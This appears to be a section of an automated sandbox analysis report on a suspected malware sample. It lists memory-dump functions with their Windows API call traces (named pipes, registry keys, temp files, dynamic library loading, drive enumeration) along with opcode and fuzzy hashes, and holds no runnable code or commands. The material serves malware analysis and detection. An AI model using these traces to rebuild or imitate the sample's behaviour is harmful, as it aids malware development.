                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                            • String ID:
                                                            • API String ID: 3733591251-0
                                                            • Opcode ID: 7e95b74091aa77cc1dbfc66b586756786d0cc72d5c260f0bc81533b6ace3a6fd
                                                            • Instruction ID: 1a2a7b25365da5d38f70195dfb3a003949b65a86dc74c5a991166349787d25e4
                                                            • Opcode Fuzzy Hash: 7e95b74091aa77cc1dbfc66b586756786d0cc72d5c260f0bc81533b6ace3a6fd
                                                            • Instruction Fuzzy Hash: 03817DB1904119FFDB209FA5DCC8DBEBBB9FB08304B4444AAF915A3250D775AE91CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wsprintfA.USER32 ref: 04BB66C9
                                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 04BB66DC
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB67F4
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BB66FF
                                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 04BB677E
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB6793
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB67AB
                                                            • GetLastError.KERNEL32(04BB54DA,?,?,?,?,?,?,?,00000040), ref: 04BB67C3
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB67CF
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB67DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                            • String ID: 0x%08X$W
                                                            • API String ID: 1559661116-2600449260
                                                            • Opcode ID: 43016cb777b06d50d8443a60fd22c1e71b5062594e3e268a3ac9e973504762c9
                                                            • Instruction ID: 48da311168723fef7195fe9fc10271ae047678183935da3fa7387f7fec363377
                                                            • Opcode Fuzzy Hash: 43016cb777b06d50d8443a60fd22c1e71b5062594e3e268a3ac9e973504762c9
                                                            • Instruction Fuzzy Hash: 664181B1900209EFDB10DFA5C884AEEBBF8FF08354F10456AE999D7240D7B5EA54CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7E74
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04BBCCC5,?,?), ref: 04BB7E9D
                                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04BB7EBD
                                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04BB7ED8
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,04BBCCC5,?,?), ref: 04BB7EE4
                                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,04BBCCC5,?,?), ref: 04BB7EE7
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7EF3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F10
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F2A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F56
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F6C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BB7F82
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,04BBCCC5,?,?), ref: 04BB7FAB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                            • String ID:
                                                            • API String ID: 3772355505-0
                                                            • Opcode ID: 4f57cd3d7d842ea5829e1559b29a522c3815a16d234f6443172239579d3a88be
                                                            • Instruction ID: bf1fbb571edf6e583f5272d5f0be1a4c5237e7e9d37a6b3b9da194f4fdf366b9
                                                            • Opcode Fuzzy Hash: 4f57cd3d7d842ea5829e1559b29a522c3815a16d234f6443172239579d3a88be
                                                            • Instruction Fuzzy Hash: 513168B190430AAFD710CF65CCD4DAA7BECEF48344B088566B948C7212EB79E815CBB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB80FB
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8106
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB810E
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB8123
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB8134
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04BB8146
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB814B
                                                            • lstrcatW.KERNEL32(00000000,04BC63D0), ref: 04BB8157
                                                            • lstrcatW.KERNEL32(00000000), ref: 04BB815F
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8164
                                                            • lstrcatW.KERNEL32(00000000,04BC63D0), ref: 04BB8170
                                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 04BB818B
                                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8193
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB81A1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                            • String ID:
                                                            • API String ID: 3635185113-0
                                                            • Opcode ID: 7970bb37baa394b5b7ba524228f7977ee7e41fa29d1a81807bd74efa19eb0e88
                                                            • Instruction ID: 23d639c3e616ecb325c26bb95dff538fbf8aa847a588746f6bf6dbbb7ccb94a0
                                                            • Opcode Fuzzy Hash: 7970bb37baa394b5b7ba524228f7977ee7e41fa29d1a81807bd74efa19eb0e88
                                                            • Instruction Fuzzy Hash: 5621CD32101215EFC3216F64ECC9EBF7BACEF89B51F01041EF585A3250DBA9AC159AB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB0E2E: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BB0E73
                                                              • Part of subcall function 04BB0E2E: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BB0E8B
                                                              • Part of subcall function 04BB0E2E: WaitForSingleObject.KERNEL32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F53
                                                              • Part of subcall function 04BB0E2E: HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F7C
                                                              • Part of subcall function 04BB0E2E: HeapFree.KERNEL32(00000000,04BB2333,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F8C
                                                              • Part of subcall function 04BB0E2E: RegCloseKey.ADVAPI32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F95
                                                            • lstrcmp.KERNEL32(?,?), ref: 04BAB991
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BAB9BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BABA6E
                                                            • GetCurrentThread.KERNEL32 ref: 04BABA7F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,04BAC3DA,?,00000001), ref: 04BABABC
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,04BAC3DA,?,00000001), ref: 04BABAD0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BABADE
                                                            • wsprintfA.USER32 ref: 04BABAF6
                                                              • Part of subcall function 04BB5440: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04BA9999,00000000,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BB544A
                                                              • Part of subcall function 04BB5440: lstrcpy.KERNEL32(00000000,00000000), ref: 04BB546E
                                                              • Part of subcall function 04BB5440: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04BB7991,?,?,?,00000000,?,00000000,00000000), ref: 04BB5475
                                                              • Part of subcall function 04BB5440: lstrcat.KERNEL32(00000000,?), ref: 04BB54CC
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 04BABB01
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BABB18
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BABB29
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BABB35
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 773763258-0
                                                            • Opcode ID: 51f73e1f8f1c5b3b6d6721d2b5ab44c9cb76baff01dbfe61e41176f159cc9dd2
                                                            • Instruction ID: 4874aa30baab7b6d838cfc2aa3c0007ac8998b4e2e49a1b0c27051575eabd132
                                                            • Opcode Fuzzy Hash: 51f73e1f8f1c5b3b6d6721d2b5ab44c9cb76baff01dbfe61e41176f159cc9dd2
                                                            • Instruction Fuzzy Hash: F9710371904219EFDB11DFA5D884EEEBBB9FB08304F0480A6E614E7220D735B965DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04BBC1AD
                                                            • memcpy.NTDLL(?,?,00000010), ref: 04BBC1D0
                                                            • memset.NTDLL ref: 04BBC21C
                                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 04BBC230
                                                            • GetLastError.KERNEL32 ref: 04BBC25E
                                                            • GetLastError.KERNEL32 ref: 04BBC2A5
                                                            • GetLastError.KERNEL32 ref: 04BBC2C4
                                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 04BBC2FE
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04BBC30C
                                                            • GetLastError.KERNEL32 ref: 04BBC386
                                                            • ReleaseMutex.KERNEL32(?), ref: 04BBC398
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BBC3AE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                            • String ID:
                                                            • API String ID: 4037736292-0
                                                            • Opcode ID: 0bd7ec92d40002c03593c5be8b31e13d5e09dc8889fe6967d09a8c58d8754056
                                                            • Instruction ID: 901ea3bb3fdb666c47b9de76160a2975deb07e4f41a6266dc08774cb7c226c18
                                                            • Opcode Fuzzy Hash: 0bd7ec92d40002c03593c5be8b31e13d5e09dc8889fe6967d09a8c58d8754056
                                                            • Instruction Fuzzy Hash: DD615C71508301AFD720DF65D844AABBBF9FF88711F40892EF596D2180E7B5E904CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000), ref: 04BA5D94
                                                            • lstrlen.KERNEL32(?), ref: 04BA5D9C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BA5DAC
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BA5DCB
                                                            • lstrlen.KERNEL32(?), ref: 04BA5DE0
                                                            • lstrlen.KERNEL32(?), ref: 04BA5DEE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 04BA5E3C
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04BA5E60
                                                            • lstrlen.KERNEL32(?), ref: 04BA5E93
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04BA5EBE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04BA5ED5
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04BA5EE2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                            • String ID:
                                                            • API String ID: 904523553-0
                                                            • Opcode ID: d2494729c03d1c55dd2224234c5c98f027a4a2994b042f197c7aa4794ded89e1
                                                            • Instruction ID: 46737cb297586994c0678fe3a9dff576b8234db0e991422a536c439a00f14d31
                                                            • Opcode Fuzzy Hash: d2494729c03d1c55dd2224234c5c98f027a4a2994b042f197c7aa4794ded89e1
                                                            • Instruction Fuzzy Hash: F8416A7190420AFFDF219F64CC84AAE7BB9FB48310F1144A6F911A7250DB35FA61DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BBAD54
                                                            • WaitForSingleObject.KERNEL32(00000404,00000000), ref: 04BBAD76
                                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 04BBAD96
                                                            • GetLastError.KERNEL32 ref: 04BBADA0
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BBADC4
                                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 04BBAE07
                                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04BBAE10
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBAE19
                                                            • CloseHandle.KERNEL32(?), ref: 04BBAE2E
                                                            • GetLastError.KERNEL32 ref: 04BBAE3B
                                                            • CloseHandle.KERNEL32(?), ref: 04BBAE48
                                                            • RtlExitUserThread.NTDLL(000000FF), ref: 04BBAE5E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                            • String ID:
                                                            • API String ID: 4053378866-0
                                                            • Opcode ID: f6a80504201a355e6ca93c15bc9e2715b902fdfee3a9c9053ef21a058e49ae4e
                                                            • Instruction ID: 6d77c9ee8a3e3b4f84ef49f869a392c3f4a5089e9d2c0a3101bcc2f339af67ef
                                                            • Opcode Fuzzy Hash: f6a80504201a355e6ca93c15bc9e2715b902fdfee3a9c9053ef21a058e49ae4e
                                                            • Instruction Fuzzy Hash: A9316070404305AFEB119F24CC888AFBBA9FF4C315F104A2AF5A5D2190D7B4AE159BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BB7920
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BB7936
                                                            • GetCurrentThread.KERNEL32 ref: 04BB7947
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                              • Part of subcall function 04BA997D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BA99E8
                                                              • Part of subcall function 04BA997D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BA9A10
                                                            • HeapFree.KERNEL32(00000000,?,04BA1F4D,?,?,?,?,?,00000000,?,00000000,00000000,?), ref: 04BB79C1
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 04BB79CD
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 04BB7A1C
                                                            • wsprintfA.USER32 ref: 04BB7A34
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BA1F4D), ref: 04BB7A3F
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BA1F4D), ref: 04BB7A56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                            • String ID: W
                                                            • API String ID: 630447368-655174618
                                                            • Opcode ID: 810ed3286c868ca2cdd82910976e24f83abfd3cf0f4b3bb3759f9818c7ae9429
                                                            • Instruction ID: d0244a63d4e8f7abdfeaaa553f2aa2a43cfdc867b5a8986150d76baa8cc07df8
                                                            • Opcode Fuzzy Hash: 810ed3286c868ca2cdd82910976e24f83abfd3cf0f4b3bb3759f9818c7ae9429
                                                            • Instruction Fuzzy Hash: 7D415775900119FBDF119FA1DC88DEEBFB9FF89344B044466E949A3210DB78AA50DBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BABCE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04BABCF7
                                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04BABD1F
                                                            • HeapFree.KERNEL32(00000000,00000001), ref: 04BABD60
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BABD70
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA6562), ref: 04BABD83
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA6562), ref: 04BABD92
                                                            • HeapFree.KERNEL32(00000000,?,?,04BA6562,?,00000001,?,?), ref: 04BABDDC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE00
                                                            • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE25
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE3A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CloseCreate
                                                            • String ID:
                                                            • API String ID: 4126010716-0
                                                            • Opcode ID: 50aa81dde7fdaef7fb9a33d01ad8bd3e3685f63880f3facae535d2d322bc0b5c
                                                            • Instruction ID: 9e9150876dd1b83a44545a0d52335743ff765d8291bf68cea927e6ce310da831
                                                            • Opcode Fuzzy Hash: 50aa81dde7fdaef7fb9a33d01ad8bd3e3685f63880f3facae535d2d322bc0b5c
                                                            • Instruction Fuzzy Hash: 7851B4B5C0810DEFDF11DFA5D8849EEBBB9FB08345F10446AE624A2210D335AE65DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04BB344A
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04BB3460
                                                            • lstrlenW.KERNEL32(00000000), ref: 04BB34A3
                                                            • RtlAllocateHeap.NTDLL(00000000,04BC4AA2), ref: 04BB34B9
                                                            • memcpy.NTDLL(00000000,00000000,04BC4AA0), ref: 04BB34CC
                                                            • _wcsupr.NTDLL ref: 04BB34D7
                                                            • lstrlenW.KERNEL32(?,04BC4AA0), ref: 04BB3510
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04BC4AA0), ref: 04BB3525
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB353B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04BB3560
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB356F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 3868788785-0
                                                            • Opcode ID: 22f5a9e72757939bd1e9cea4c6d68643ebc7b2335376c0857b871d7e36f9a321
                                                            • Instruction ID: a850935660ca67e215e985bc13402fb5f1921fac401d846557c25b00bc174bde
                                                            • Opcode Fuzzy Hash: 22f5a9e72757939bd1e9cea4c6d68643ebc7b2335376c0857b871d7e36f9a321
                                                            • Instruction Fuzzy Hash: 0F31C432504214ABC7215F78ECC8DBF7BE8EB49321B15865AF991D3181DBB9FC448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcscpy.NTDLL ref: 04BBA62A
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04BBA636
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBA647
                                                            • memset.NTDLL ref: 04BBA664
                                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04BBA672
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBA680
                                                            • GetDriveTypeW.KERNEL32(?), ref: 04BBA68E
                                                            • lstrlenW.KERNEL32(?), ref: 04BBA69A
                                                            • wcscpy.NTDLL ref: 04BBA6AC
                                                            • lstrlenW.KERNEL32(?), ref: 04BBA6C6
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BBA6DF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                            • String ID:
                                                            • API String ID: 3888849384-0
                                                            • Opcode ID: 5ffe7c21e9c56a0d15ac99b44b000d5bf3e80f0e416cc927fca75aef60ceb517
                                                            • Instruction ID: 1f05a5c5e38468f5f99a7adea7086ca9b5bb3fea7a882cd860fc4e1e99d1daf5
                                                            • Opcode Fuzzy Hash: 5ffe7c21e9c56a0d15ac99b44b000d5bf3e80f0e416cc927fca75aef60ceb517
                                                            • Instruction Fuzzy Hash: D5312572C00108FFCB11ABA5EC88CEEBFB9EF49365B108056E145E3151EB75AA55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BAA5FD
                                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04BA1E48,?,00000094,00000000,?,?,00000000,?), ref: 04BAA615
                                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04BAA624
                                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04BA1E48,?,00000094,00000000,?,?,00000000,?), ref: 04BAA637
                                                            • GetTickCount.KERNEL32 ref: 04BAA63B
                                                            • wsprintfA.USER32 ref: 04BAA652
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04BAA68D
                                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04BAA6AA
                                                            • lstrlen.KERNEL32(00000000), ref: 04BAA6B4
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BAA6D0
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 04BAA6DE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 1404517112-0
                                                            • Opcode ID: 02ef5d93f79ff19e9e74f8dedbef95fbaba044eac96f131b47569ed221c9e56e
                                                            • Instruction ID: 91ba04cf558db762feae44b58b598c56a2b9b32dc7b75d73a473edeb147557ab
                                                            • Opcode Fuzzy Hash: 02ef5d93f79ff19e9e74f8dedbef95fbaba044eac96f131b47569ed221c9e56e
                                                            • Instruction Fuzzy Hash: 64313475504209FFDB109FA5ECC8DAF7BACEB49395B048066F909D7100D638AE65DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BB5551
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BB5570
                                                              • Part of subcall function 04BAB7B9: wsprintfA.USER32 ref: 04BAB7CC
                                                              • Part of subcall function 04BAB7B9: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BAB7DE
                                                              • Part of subcall function 04BAB7B9: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BAB808
                                                              • Part of subcall function 04BAB7B9: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAB81B
                                                              • Part of subcall function 04BAB7B9: CloseHandle.KERNEL32(?), ref: 04BAB824
                                                            • GetLastError.KERNEL32 ref: 04BB5843
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB5853
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB5864
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BB5872
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                            • String ID:
                                                            • API String ID: 1258333524-0
                                                            • Opcode ID: f501b915d9b7277d85ce8857799e3df85a256be418dc3911634b9a07482a7cfb
                                                            • Instruction ID: f8d75cdab56b49f3c3eff05ae9fd2c708180c183875cac695412b859baef6096
                                                            • Opcode Fuzzy Hash: f501b915d9b7277d85ce8857799e3df85a256be418dc3911634b9a07482a7cfb
                                                            • Instruction Fuzzy Hash: F2B13A71500209EFEB309F21DC84EAA7BBAFF08349F104969F999D6150E7B4E954CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(05C8B060,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DB6
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DC5
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DD2
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04BC1DEA
                                                            • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04BC1DF6
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC1E12
                                                            • wsprintfA.USER32 ref: 04BC1EF4
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BC1F41
                                                            • InterlockedExchange.KERNEL32(04BCC0BC,00000000), ref: 04BC1F5F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC1FA0
                                                              • Part of subcall function 04BA24CF: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                              • Part of subcall function 04BA24CF: memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                              • Part of subcall function 04BA24CF: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
